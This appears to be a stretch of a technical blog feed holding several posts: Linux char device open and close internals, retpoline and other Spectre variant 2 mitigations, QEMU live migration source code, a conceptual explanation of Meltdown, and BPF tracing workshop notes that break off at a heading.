<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> void init_special_inode(struct inode *inode, umode_t mode, dev_t rdev)
{
inode->i_mode = mode;
if (S_ISCHR(mode)) {
inode->i_fop = &def_chr_fops;
inode->i_rdev = rdev;
} else if (S_ISBLK(mode)) {
inode->i_fop = &def_blk_fops;
inode->i_rdev = rdev;
} else if (S_ISFIFO(mode))
inode->i_fop = &pipefifo_fops;
else if (S_ISSOCK(mode))
inode->i_fop = &bad_sock_fops;
else
printk(KERN_DEBUG "init_special_inode: bogus i_mode (%o) for"
" inode %s:%lu\n", mode, inode->i_sb->s_id,
inode->i_ino);
}
</code></pre></div></div>
<p>This function’s work is to set the inode’s fields ‘i_fop’ and ‘i_rdev’. A char device’s ‘i_fop’ is set to ‘def_chr_fops’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> const struct file_operations def_chr_fops = {
.open = chrdev_open,
.llseek = noop_llseek,
};
</code></pre></div></div>
<p>The VFS and device driver is connected by ‘inode->i_rdev’ now.</p>
<h1 id="char-devices-operation">Char device’s operation</h1>
<p>Now the user program can open our device and issue system calls like open/write/read.</p>
<p>do_sys_open
-->do_filp_open
-->path_openat
-->do_last
-->vfs_open
-->do_dentry_open</p>
<p>After a long call chain, we arrive at the ‘do_dentry_open’ function:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int do_dentry_open(struct file *f,
struct inode *inode,
int (*open)(struct inode *, struct file *),
const struct cred *cred)
{
static const struct file_operations empty_fops = {};
int error;
f->f_mode = OPEN_FMODE(f->f_flags) | FMODE_LSEEK |
FMODE_PREAD | FMODE_PWRITE;
path_get(&f->f_path);
f->f_inode = inode;
f->f_mapping = inode->i_mapping;
...
/* POSIX.1-2008/SUSv4 Section XSI 2.9.7 */
if (S_ISREG(inode->i_mode))
f->f_mode |= FMODE_ATOMIC_POS;
f->f_op = fops_get(inode->i_fop);
if (unlikely(WARN_ON(!f->f_op))) {
error = -ENODEV;
goto cleanup_all;
}
...
if (!open)
open = f->f_op->open;
if (open) {
error = open(inode, f);
if (error)
goto cleanup_all;
}
...
}
</code></pre></div></div>
<p>Here the ‘inode’ belongs to our created ‘/dev/chr_dev’ file. ‘inode->i_fop’ is assigned to ‘f->f_op’. As we know:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> inode->i_fop = &def_chr_fops;
</code></pre></div></div>
<p>So
f->f_op = &def_chr_fops</p>
<p>Later, it will call f_op->open, which is ‘chrdev_open’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int chrdev_open(struct inode *inode, struct file *filp)
{
const struct file_operations *fops;
struct cdev *p;
struct cdev *new = NULL;
int ret = 0;
spin_lock(&cdev_lock);
p = inode->i_cdev;
if (!p) {
struct kobject *kobj;
int idx;
spin_unlock(&cdev_lock);
kobj = kobj_lookup(cdev_map, inode->i_rdev, &idx);
if (!kobj)
return -ENXIO;
new = container_of(kobj, struct cdev, kobj);
spin_lock(&cdev_lock);
/* Check i_cdev again in case somebody beat us to it while
we dropped the lock. */
p = inode->i_cdev;
if (!p) {
inode->i_cdev = p = new;
list_add(&inode->i_devices, &p->list);
new = NULL;
} else if (!cdev_get(p))
ret = -ENXIO;
} else if (!cdev_get(p))
ret = -ENXIO;
spin_unlock(&cdev_lock);
cdev_put(new);
if (ret)
return ret;
ret = -ENXIO;
fops = fops_get(p->ops);
if (!fops)
goto out_cdev_put;
replace_fops(filp, fops);
if (filp->f_op->open) {
ret = filp->f_op->open(inode, filp);
if (ret)
goto out_cdev_put;
}
return 0;
out_cdev_put:
cdev_put(p);
return ret;
}
</code></pre></div></div>
<p>‘kobj_lookup’ finds the cdev in ‘cdev_map’ according to ‘i_rdev’. Once the cdev is found, filp’s ‘f_op’ is replaced by our cdev’s ops, which is the struct file_operations implemented in our char device driver.</p>
<p>Next it calls the open function of the struct file_operations implemented in the driver.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> +--------------------------+
| open("/dev/chr_dev") |
+----------+----+----------+
| ^
1 | |
v |
+---------+----+-----+
| do_sys_open |
+--------+-----+-----+
inode | |
+-----------+ | +----------------5-------------------+
| | | |
+-----------+ | filp +-------------+ |
| i_fop | <-----+ | | |
+-----------+ +-------------+ +----+---+
+----+ i_rdev | +---+ f_op +-------+ fd |
| +-----------+ | +-------------+ +--------+
| | i_cdev +--------------+ | | ||
2 | +-----------+ | | +-------------|
| | +-------4-----------+
+----------------------+ | |
| 3 +--->v+----------------+
+-------+ +--------+ +----v----+ | | | read |
| +---> | +-> | | | | +----------------+
+-------+ +--------+ +----+----+ | | | write |
cdev_map | v | +----------------+
+------->----------------+ | | ioctl |
data | | | +----------------+
+---------------+ | | ... |
| ops +---+ +----------------+
+---------------+ | release |
| | |----------------+
+---------------+ file_operations
cdev
</code></pre></div></div>
<p>The above picture shows the process of opening a device file from a user process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> 1. The kernel calls do_sys_open, gets the file's inode and calls i_fop->open, which for a char device is chrdev_open
2. chrdev_open finds the cdev in cdev_map according to inode->i_rdev
3. the found cdev is cached in inode->i_cdev, so the next open needs no cdev_map lookup
4. cdev->ops is assigned to filp->f_op, so later file system syscalls reach the driver's file_operations directly through fd->filp->f_op
5. the fd is returned to the user program
</code></pre></div></div>
<p>Let’s look at an example of how the fd returned by open is used, taking the close syscall.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> SYSCALL_DEFINE1(close, unsigned int, fd)
{
int retval = __close_fd(current->files, fd);
/* can't restart close syscall because file table entry was cleared */
if (unlikely(retval == -ERESTARTSYS ||
retval == -ERESTARTNOINTR ||
retval == -ERESTARTNOHAND ||
retval == -ERESTART_RESTARTBLOCK))
retval = -EINTR;
return retval;
}
EXPORT_SYMBOL(sys_close);
int __close_fd(struct files_struct *files, unsigned fd)
{
struct file *file;
struct fdtable *fdt;
spin_lock(&files->file_lock);
fdt = files_fdtable(files);
if (fd >= fdt->max_fds)
goto out_unlock;
file = fdt->fd[fd];
if (!file)
goto out_unlock;
rcu_assign_pointer(fdt->fd[fd], NULL);
__clear_close_on_exec(fd, fdt);
__put_unused_fd(files, fd);
spin_unlock(&files->file_lock);
return filp_close(file, files);
out_unlock:
spin_unlock(&files->file_lock);
return -EBADF;
}
int filp_close(struct file *filp, fl_owner_t id)
{
int retval = 0;
if (!file_count(filp)) {
printk(KERN_ERR "VFS: Close: file count is 0\n");
return 0;
}
if (filp->f_op->flush)
retval = filp->f_op->flush(filp, id);
if (likely(!(filp->f_mode & FMODE_PATH))) {
dnotify_flush(filp, id);
locks_remove_posix(filp, id);
}
fput(filp);
return retval;
}
</code></pre></div></div>
<p>Finally we reach ‘__fput’:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void __fput(struct file *file)
{
struct dentry *dentry = file->f_path.dentry;
struct vfsmount *mnt = file->f_path.mnt;
struct inode *inode = file->f_inode;
might_sleep();
fsnotify_close(file);
/*
* The function eventpoll_release() should be the first called
* in the file cleanup chain.
*/
eventpoll_release(file);
locks_remove_file(file);
if (unlikely(file->f_flags & FASYNC)) {
if (file->f_op->fasync)
file->f_op->fasync(-1, file, 0);
}
ima_file_free(file);
if (file->f_op->release)
file->f_op->release(inode, file);
security_file_free(file);
if (unlikely(S_ISCHR(inode->i_mode) && inode->i_cdev != NULL &&
!(file->f_mode & FMODE_PATH))) {
cdev_put(inode->i_cdev);
}
fops_put(file->f_op);
put_pid(file->f_owner.pid);
if ((file->f_mode & (FMODE_READ | FMODE_WRITE)) == FMODE_READ)
i_readcount_dec(inode);
if (file->f_mode & FMODE_WRITER) {
put_write_access(inode);
__mnt_drop_write(mnt);
}
file->f_path.dentry = NULL;
file->f_path.mnt = NULL;
file->f_inode = NULL;
file_free(file);
dput(dentry);
mntput(mnt);
}
</code></pre></div></div>
<p>From the above we can see that the kernel calls many filp->f_op functions, which are defined in the struct file_operations of the char device driver.</p>
retpoline: Principles and Deployment2018-03-24T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/24/retpoline
<p>This article is mainly translated from <a href="https://software.intel.com/sites/default/files/managed/1d/46/Retpoline-A-Branch-Target-Injection-Mitigation.pdf?source=techstories.org">Retpoline: A Branch Target Injection Mitigation</a>.</p>
<h3> Principles </h3>
<p>retpoline is a mitigation technique developed by Google against the Spectre variant 2 vulnerability. Spectre variant 2 exploits the CPU’s indirect branch predictor: the attacker trains the branch predictor in advance so that it influences the victim process, then extracts the victim’s information through a side channel. Exploiting variant 2 is actually very difficult; Jann Horn’s exploit targeted an old version of KVM, and in Linus’s words, exploiting Spectre is “fairly hard”.</p>
<p>There are currently two approaches to mitigating Spectre: a hardware one and a software one. The hardware approach is IBRS + IBPB, which blocks speculative execution directly at the hardware level; of course, this costs a lot of performance, so IBRS did not make it into the kernel. The main software approach is retpoline, which, thanks to its lower performance impact, was eventually merged into the mainline kernel.</p>
<p>Whenever the CPU is about to execute an indirect branch, such as jmp [xxx] or an indirect call, it consults the indirect branch predictor and speculatively picks the most likely path. retpoline bypasses the indirect branch predictor, so the CPU cannot follow branch paths that someone else has deliberately trained. The name retpoline combines “return” and “trampoline”: the indirect branch is replaced by a trampoline built out of return instructions. This will become clear later.</p>
<p>Prediction for the ret instruction differs from jmp and call: ret relies on the Return Stack Buffer (RSB). Unlike the indirect branch predictor, the RSB is a last-in, first-out stack. Executing a call pushes an entry and executing a ret pops one, which is easy for software to control, as in the following instruction sequence:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>__asm__ __volatile__(" call 1f; pause;"
"1: call 2f; pause;"
"2: call 3f; pause;"
"3: call 4f; pause;"
"4: call 5f; pause;"
"5: call 6f; pause;"
</code></pre></div></div>
<p><img src="/assets/img/retpoline/retpoline.png" alt="" /></p>
<p>The figure above shows the basic idea of retpoline: the original indirect branch is replaced with a sequence of instructions, and if the CPU speculates, it falls into an endless loop.</p>
<p>Let’s analyze how an indirect jmp is replaced by the retpoline sequence.</p>
<p><img src="/assets/img/retpoline/jmp.png" alt="" /></p>
<p>In this example, jmp jumps indirectly through the value of rax. Without retpoline, the processor would consult the indirect branch predictor, and if an attacker had trained this branch beforehand, the CPU could be steered into executing a specific gadget. Let’s see how retpoline stops the CPU from speculating.</p>
<ol>
<li>
<p>“1: call load_label” pushes the address of “2: pause ; lfence” onto the stack and also fills one RSB entry, then jumps to load_label;</p>
</li>
<li>
<p>“4: mov %rax, (%rsp)” puts the indirect jump target (*%rax) on top of the stack; note that at this point the return address on the in-memory stack and the one in the RSB no longer match;</p>
</li>
<li>
<p>if the CPU speculates at the ret, it follows the address filled into the RSB in step 1, i.e. “2: pause ; lfence”, which is an endless loop;</p>
</li>
<li>
<p>finally, the CPU notices that the return address on the in-memory stack differs from the address it speculated from the RSB, so speculation is aborted and execution jumps to *%rax.</p>
</li>
</ol>
<p>Now let’s see how a call instruction works after being replaced by the retpoline sequence.</p>
<p><img src="/assets/img/retpoline/call.png" alt="" /></p>
<ol>
<li>First, “1: jmp label2” jumps to “7: call label0”;</li>
<li>“7: call label0” pushes the address of “8: … continue execution” onto both the in-memory stack and the RSB, then jumps to label0;</li>
<li>“2: call label1” pushes the address of “3: pause ; lfence” onto both the in-memory stack and the RSB, then jumps to label1;</li>
</ol>
<p>At this point the in-memory stack and the RSB look like this:</p>
<p><img src="/assets/img/retpoline/4.png" alt="" /></p>
<ol>
<li>
<p>“5: mov %rax, (%rsp)” puts the indirect call target (*%rax) on top of the stack; again, the top of the in-memory stack and the RSB entry no longer match;</p>
</li>
<li>
<p>“6: ret”. If the CPU speculates at this ret, it follows the address filled into the RSB in step 3, “3: pause ; lfence”, which is an endless loop;</p>
</li>
<li>
<p>finally, the CPU notices the mismatch between the return address on the in-memory stack and the RSB, so speculation is aborted and execution jumps to *%rax;</p>
</li>
</ol>
<p>At this point the in-memory stack and the RSB look like this:</p>
<p><img src="/assets/img/retpoline/5.png" alt="" /></p>
<ol>
<li>When the indirect call (*%rax) returns, the RSB and the in-memory stack agree again, so execution continues at the address pushed in step 2, i.e. at label 8.</li>
</ol>
<h3> Deployment </h3>
<p>Since most indirect branches are generated by the compiler, compiler support is required. The latest gcc supports the -mindirect-branch=thunk option to replace indirect branches with retpoline sequences. Here is a simple example:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include <stdio.h>
#include <stdlib.h>
typedef void (*fp)();
void test()
{
printf("indirect test\n");
}
int main()
{
fp f = test;
f();
}
</code></pre></div></div>
<p>The above is a typical indirect jump.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code># gcc -mindirect-branch=thunk test.c -o test
# objdump -d test
...
00000000004004d8 <main>:
4004d8: 55 push %rbp
4004d9: 48 89 e5 mov %rsp,%rbp
4004dc: 48 83 ec 10 sub $0x10,%rsp
4004e0: 48 c7 45 f8 c7 04 40 movq $0x4004c7,-0x8(%rbp)
4004e7: 00
4004e8: 48 8b 55 f8 mov -0x8(%rbp),%rdx
4004ec: b8 00 00 00 00 mov $0x0,%eax
4004f1: e8 07 00 00 00 callq 4004fd <__x86_indirect_thunk_rdx>
4004f6: b8 00 00 00 00 mov $0x0,%eax
4004fb: c9 leaveq
4004fc: c3 retq
00000000004004fd <__x86_indirect_thunk_rdx>:
4004fd: e8 07 00 00 00 callq 400509 <__x86_indirect_thunk_rdx+0xc>
400502: f3 90 pause
400504: 0f ae e8 lfence
400507: eb f9 jmp 400502 <__x86_indirect_thunk_rdx+0x5>
400509: 48 89 14 24 mov %rdx,(%rsp)
40050d: c3 retq
40050e: 66 90 xchg %ax,%ax
...
</code></pre></div></div>
<p>We can see that the indirect jump has been replaced by the retpoline instruction sequence. Of course, for indirect jumps written in inline assembly, the retpoline sequence has to be added by hand.</p>
<p>In the Linux kernel, a kernel command-line parameter decides whether retpoline is enabled; if it is, the kernel patches the instructions dynamically at boot. This minimizes the kernel’s performance loss.</p>
An Introduction to Spectre Mitigations2018-03-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/07/spectre-mitigation
<h3>Background</h3>
<p>CPUs use indirect branch predictors for speculative execution. An attacker can train the predictor to make the CPU speculatively execute specific instructions and then perform side-channel analysis. This is the Spectre variant 2 vulnerability.</p>
<p>Intel provides three hardware mechanisms for controlling indirect branches, which operating systems can use to prevent attackers from controlling the indirect branch predictor: IBRS, STIBP and IBPB. This article introduces these three mechanisms and their status in Linux upstream, and offers some personal mitigation suggestions.</p>
<h3>The Indirect Branch Control Mechanisms</h3>
<p>If CPUID.(EAX=7H,ECX=0):EDX[26] is 1, IBRS and IBPB are supported, and the OS can write IA32_SPEC_CTRL[0] (IBRS) and IA32_PRED_CMD[0] (IBPB) to control the behavior of the indirect branch predictor.
If CPUID.(EAX=7H,ECX=0):EDX[27] is 1, STIBP is supported, and the OS can write IA32_SPEC_CTRL[1] (STIBP).</p>
<p>So there are two new MSRs, IA32_SPEC_CTRL and IA32_PRED_CMD: IBRS and STIBP are controlled through the former, IBPB through the latter. As the names suggest, IBRS and STIBP are controls while IBPB is a command; concretely, IBRS and STIBP carry persistent state, whereas IBPB is a one-shot trigger. As a rough analogy, IBRS is like a monthly salary that predictably tops up your pocket money, while IBPB is like picking up a 10-yuan note off the ground.</p>
<p>Indirect Branch Restricted Speculation (IBRS): in short, writing 1 to the IBRS control bit in more-privileged code guarantees that indirect branches are not affected by predictor entries trained at a lower privilege level, and also guards against influence from a sibling logical processor (under hyper-threading). The privilege transitions here are host user -> host kernel, guest -> host, and so on. IBRS can be understood as predictor isolation between privilege levels.
IBRS does not prevent predictor sharing within the same privilege level; that requires IBPB.
IBRS also does not prevent RSB pollution; the RSB must be cleared when entering the privileged level.</p>
<p>Single thread indirect branch predictors (STIBP): under hyper-threading, the logical processors of a core share an indirect branch predictor. STIBP disables this sharing, preventing one logical processor’s predictor from being polluted by the other. STIBP is a subset of IBRS, so once IBRS is enabled there is usually no need to enable STIBP.</p>
<p>Indirect Branch Predictor Barrier (IBPB): IBPB acts as a barrier; indirect branch predictor state established before the barrier does not affect execution after it.</p>
<p>In summary, IBRS and IBPB can be combined as the mitigation for Spectre variant 2:
IBRS prevents predictor pollution across privilege levels, and IBPB prevents predictor pollution between different entities at the same privilege level (such as between applications or between virtual machines).</p>
<h3> Status in Linux and Mitigation Suggestions</h3>
<p>IBRS ultimately did not make it into the kernel because of its performance cost; upstream chose Google’s retpoline instead. As an aside, Google found the vulnerability and then got its own fix merged upstream, which is quite impressive. As far as I can see, IBPB has already been merged (at least on VM switches).</p>
<p>Personal mitigation suggestions:
as shown above, there are two options.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>retpoline + IBPB: retpoline requires fairly invasive kernel changes and compiler support.
IBRS + IBPB: simpler and predictably stable; can be deployed only on the virtualization side, with IBRS for guest/host and IBPB for guest/guest.
</code></pre></div></div>
<p>I suggest benchmarking the second option first, to see how big the performance loss really is before deciding.</p>
<h3> References </h3>
<p><a href="http://kib.kiev.ua/x86docs/SDMs/336996-001.pdf">Speculative Execution Side Channel
Mitigations</a></p>
<p><a href="https://medium.com/@mattklein123/meltdown-spectre-explained-6bc8634cc0c2">Meltdown and Spectre, explained</a></p>
A Brief Introduction to QEMU Live Migration2018-03-01T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/03/01/qemu-live-migration
<h3> Using Live Migration </h3>
<p>The benefits of live migration in a virtualized environment are obvious, so QEMU/KVM has supported it for a long time.
First let’s see how it is used. According to the official <a href="https://www.linux-kvm.org/page/Migration">instructions</a>, the source and destination normally need shared access to the VM image; for simplicity, here we just use the same VM image on both hosts.</p>
<p>Start a VM vm1 on the src:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu-system-x86_64 -m 2048 -hda centos.img -vnc :0 --enable-kvm
</code></pre></div></div>
<p>Start another VM vm2 on the dst:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu-system-x86_64 -m 2048 -hda centos.img -vnc :0 --enable-kvm -incoming tcp:0:6666
</code></pre></div></div>
<p>In vm1’s monitor, enter:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>migrate tcp:$ip:6666
</code></pre></div></div>
<p>After a dozen seconds or so, vm2 has become what vm1 was, and vm1 is in the stopped state.</p>
<h3> How Live Migration Works </h3>
<p><img src="/assets/img/qemulm/1.png" alt="" /></p>
<p>First, let’s see which parts of QEMU are involved in live migration. The grey area in the middle of the figure is the VM’s RAM; it is a complete black box to QEMU, which makes no assumptions about it and simply ships it wholesale to the dst. The area on the left represents device state, which is visible to the VM; QEMU sends it using its own protocol. The area on the right is not migrated, but the dst must still match the src, so generally launching the src and dst VMs with the same QEMU command line keeps this part consistent.</p>
<p>Many conditions must be met before live migration is possible:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. shared storage, such as NFS
2. identical time on the hosts
3. identical network configuration; the dst must be able to reach any network the src can
4. identical host CPU types, since the host exposes its instruction set to the guest
5. identical VM machine type, QEMU version, ROM version, etc.
</code></pre></div></div>
<p>Live migration consists of three main steps:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>1. mark all of the VM's RAM dirty; main function: ram_save_setup
2. keep iterating, sending the VM's dirty RAM pages to the dst, until some condition holds, e.g. the number of dirty pages is small enough; main function: ram_save_iterate
3. stop the guest on the src, send the remaining dirty RAM, then send the device state; main function: qemu_savevm_state_complete_precopy
</code></pre></div></div>
<p>Steps 1 and 2 cover the grey area in the figure above; step 3 covers the grey area plus the area on the left.</p>
<p>After that, QEMU can resume running the VM on the dst.</p>
<h3> Source Analysis: the Sending Side </h3>
<p>After the migrate command is entered in QEMU’s monitor, the following functions are traversed:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>hmp_migrate
->qmp_migrate
->tcp_start_outgoing_migration
->socket_start_outgoing_migration
->socket_outgoing_migration
->migration_channel_connect
->qemu_fopen_channel_output
->migrate_fd_connect
</code></pre></div></div>
<p>The last function is the important one: it creates a migration thread whose thread function is migration_thread.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>void migrate_fd_connect(MigrationState *s)
{
xxx
qemu_thread_create(&s->thread, "migration", migration_thread, s,
QEMU_THREAD_JOINABLE);
s->migration_thread_running = true;
}
static void *migration_thread(void *opaque)
{
xxx
qemu_savevm_state_begin(s->to_dst_file, &s->params);
xxx
while (s->state == MIGRATION_STATUS_ACTIVE ||
s->state == MIGRATION_STATUS_POSTCOPY_ACTIVE) {
xxx
if (!qemu_file_rate_limit(s->to_dst_file)) {
uint64_t pend_post, pend_nonpost;
qemu_savevm_state_pending(s->to_dst_file, max_size, &pend_nonpost,
&pend_post);
xxx
if (pending_size && pending_size >= max_size) {
xxx
/* Just another iteration step */
qemu_savevm_state_iterate(s->to_dst_file, entered_postcopy);
} else {
migration_completion(s, current_active_state,
&old_vm_running, &start_time);
break;
}
}
xxx
}
</code></pre></div></div>
<p>migration_thread carries out the three live-migration steps described earlier.
Let’s start with step 1: qemu_savevm_state_begin marks all RAM dirty:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu_savevm_state_begin
-->ram_save_setup
-->ram_save_init_globals
-->bitmap_new
-->bitmap_set
</code></pre></div></div>
<p>Step 2 is done by two functions in migration_thread’s while loop:
qemu_savevm_state_pending and qemu_savevm_state_iterate.</p>
<p>The first, via the callback ram_save_pending, determines how many bytes remain to be transferred; this is straightforward.
The second, via the callback ram_save_iterate, transfers the dirty pages to the dst.</p>
<p>ram_save_iterate
–>ram_find_and_save_block
–>find_dirty_block
–>ram_save_host_page
–>ram_save_target_page
–>migration_bitmap_clear_dirty
–>ram_save_page
–>qemu_put_buffer_async
–>…->qemu_fflush
–>…->send</p>
<p>The while loop keeps calling ram_save_pending and ram_save_iterate, continuously sending the VM’s dirty pages to the dst until a certain condition is met, and then enters step 3.</p>
<p>Step 3 is migration_completion, called from migration_thread; it stops the src VM and copies the last remaining dirty pages to the dst.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>migration_completion
-->vm_stop_force_state
-->bdrv_inactivate_all
-->qemu_savevm_state_complete_precopy
-->ram_save_complete
-->ram_find_and_save_block
</code></pre></div></div>
<p>As you can see, the last function is the same one used to transfer dirty pages in step 2.</p>
<h3>Source Analysis: the Receiving Side</h3>
<p>The receiving QEMU runs with the same parameters as the sender, plus one extra: -incoming tcp:0:6666. After parsing -incoming, QEMU waits for the migration from the src. Let’s walk through this flow.</p>
<p>main
–>qemu_start_incoming_migration
–>tcp_start_incoming_migration
–>socket_start_incoming_migration
–>socket_accept_incoming_migration
–>migration_channel_process_incoming
–>qemu_fopen_channel_input
–>migration_fd_process_incoming
–>process_incoming_migration_co
–>qemu_loadvm_state
–>bdrv_invalidate_cache_all</p>
<p>process_incoming_migration_co receives the data and resumes the VM. The most important function is qemu_loadvm_state, which receives the data and reconstructs the VM on the dst.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>int qemu_loadvm_state(QEMUFile *f)
{
xxx check versions
ret = qemu_loadvm_state_main(f, mis);
xxx
cpu_synchronize_all_post_init();
return ret;
}
</code></pre></div></div>
<p>Clearly, qemu_loadvm_state_main is the main function that rebuilds the VM.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>static int qemu_loadvm_state_main(QEMUFile *f, MigrationIncomingState *mis)
{
uint8_t section_type;
int ret = 0;
while ((section_type = qemu_get_byte(f)) != QEMU_VM_EOF) {
ret = 0;
trace_qemu_loadvm_state_section(section_type);
switch (section_type) {
case QEMU_VM_SECTION_START:
case QEMU_VM_SECTION_FULL:
ret = qemu_loadvm_section_start_full(f, mis);
if (ret < 0) {
goto out;
}
break;
case QEMU_VM_SECTION_PART:
case QEMU_VM_SECTION_END:
ret = qemu_loadvm_section_part_end(f, mis);
if (ret < 0) {
goto out;
}
break;
case QEMU_VM_COMMAND:
ret = loadvm_process_command(f);
trace_qemu_loadvm_state_section_command(ret);
if ((ret < 0) || (ret & LOADVM_QUIT)) {
goto out;
}
break;
default:
error_report("Unknown savevm section type %d", section_type);
ret = -EINVAL;
goto out;
}
}
out:
if (ret < 0) {
qemu_file_set_error(f, ret);
}
return ret;
}
</code></pre></div></div>
<p>qemu_loadvm_state_main processes each section in a loop; the src puts markers such as QEMU_VM_SECTION_START into the stream.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>qemu_loadvm_section_start_full
-->find_se
-->vmstate_load
-->ram_load
-->qemu_get_buffer
</code></pre></div></div>
<p>The last function copies the received data into the dst VM’s memory.
This has been a quick analysis of live migration; later posts will look at some specific issues.</p>
<h3>References</h3>
<p>Amit Shah: <a href="https://developers.redhat.com/blog/2015/03/24/live-migrating-qemu-kvm-virtual-machines/">Live Migrating QEMU-KVM Virtual Machines</a></p>
A Beginner's Understanding of the Meltdown Vulnerability2018-01-04T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2018/01/04/metldown
<p>The goal of this post is to help beginners like me quickly understand the Meltdown vulnerability.</p>
<p>Straight to the picture:</p>
<p><img src="/assets/img/meltdown/1.png" alt="" /></p>
<p>The root cause of the vulnerability is the CPU’s speculative execution. Instructions 1, 2 and 3 in the figure appear to execute in order, but in reality a modern CPU has long since started executing them in parallel, for efficiency: while executing instruction 1, it can also execute instructions 2 and 3. Since instruction 1 faults, the dependent instructions that were already executed are never committed to the registers; the CPU’s work is thrown away and rax and rbx are not modified. This is the rollback after a mis-speculation. The problem lies in this rollback: on the surface all registers and architectural state are rolled back, but the TLB and the caches are not.</p>
<p>Normally instruction 1 would fail because we are accessing a kernel address from user mode. But at the CPU level, the permission check and the data read are decoupled, again for efficiency. After the CPU has read the data at the kernel address, i.e. after 1a has executed, speculation lets it run instructions 2 and 3 in parallel; if they finish before 1b, i.e. before the exception flag is set, instruction 3 will have loaded the data at address rbx+rax*4096 into the cache. In instruction 2 we shifted the value left by 0xc bits, which is equivalent to multiplying by 4096. rax*4096 is used to index an array, so the line at rbx+rax*4096 gets cached. When the CPU then executes 1b, notices the permission violation and rolls back, the cache is not cleaned up, so the data is still cached.</p>
<p>Now we can probe the locations rbx + i*4096. Since exactly one of them is cached, accessing that one takes far less time than the others, so we recover the value at the corresponding kernel address. This is the so-called side-channel attack.</p>
linux-tracing-workshop-part 32017-12-13T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2017/12/13/tracing3
<p>Notes from the <a href="https://github.com/goldshtn/linux-tracing-workshop">linux-tracing-workshop</a> labs; this is the third of three parts.</p>
<ul>
<li><a href="#13">13. Using BPF Tools: trace and argdist One-Liners</a></li>
<li><a href="#14">14. Using BPF Tools: CPU and Off-CPU Investigation</a></li>
<li><a href="#15">15. Using perf Tools: Slow File I/O</a></li>
</ul>
<h2 id="13">13. Using BPF Tools: trace and argdist One-Liners</h2>
<h3>Showing All Login Attempts with trace</h3>
<p>Whenever someone logs into the system or uses su, a set*uid call is made, so trace can record all logins and su operations on the system.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./trace '::sys_setuid "uid=%d", arg1'
PID TID COMM FUNC -
53999 53999 sshd sys_setuid uid=0
54050 54050 su sys_setuid uid=1000
54076 54076 cron sys_setuid uid=0
54103 54103 cron sys_setuid uid=0
</code></pre></div></div>
<h3>Finding Hot Files with argdist</h3>
<p>argdist shows the distribution of function arguments; tracing the arguments of __vfs_write and __vfs_read reveals the hot files.
Start argdist in one terminal and a dd in another:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> dd if=/dev/zero of=/dev/null bs=1K count=1M
</code></pre></div></div>
<p>Here is the output:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> root@ubuntu1604:/usr/share/bcc/tools# ./argdist -T 5 -i 2 -C 'p::__vfs_write(struct file *f):char*:f->f_path.dentry->d_name.name#writes' -C 'p::__vfs_read(struct file *f):char*:f->f_path.dentry->d_name.name#reads'
[16:11:05]
writes
COUNT EVENT
1 f->f_path.dentry->d_name.name = kprobe_events
3 f->f_path.dentry->d_name.name = [eventfd]
3 f->f_path.dentry->d_name.name = 1
7 f->f_path.dentry->d_name.name = TCP
reads
COUNT EVENT
1 f->f_path.dentry->d_name.name = inotify
1 f->f_path.dentry->d_name.name = [timerfd]
3 f->f_path.dentry->d_name.name = [eventfd]
24 f->f_path.dentry->d_name.name = ptmx
[16:11:07]
writes
COUNT EVENT
9 f->f_path.dentry->d_name.name = 1
24 f->f_path.dentry->d_name.name = TCP
reads
COUNT EVENT
18 f->f_path.dentry->d_name.name = ptmx
[16:11:09]
writes
COUNT EVENT
1 f->f_path.dentry->d_name.name = TCP
1 f->f_path.dentry->d_name.name = 4
6 f->f_path.dentry->d_name.name = 1
15 f->f_path.dentry->d_name.name = TCP
505475 f->f_path.dentry->d_name.name = null
reads
COUNT EVENT
1 f->f_path.dentry->d_name.name = TCP
2 f->f_path.dentry->d_name.name = ld-2.23.so
3 f->f_path.dentry->d_name.name = dd
28 f->f_path.dentry->d_name.name = ptmx
505475 f->f_path.dentry->d_name.name = zero
</code></pre></div></div>
<h3>Showing PostgreSQL Queries with trace</h3>
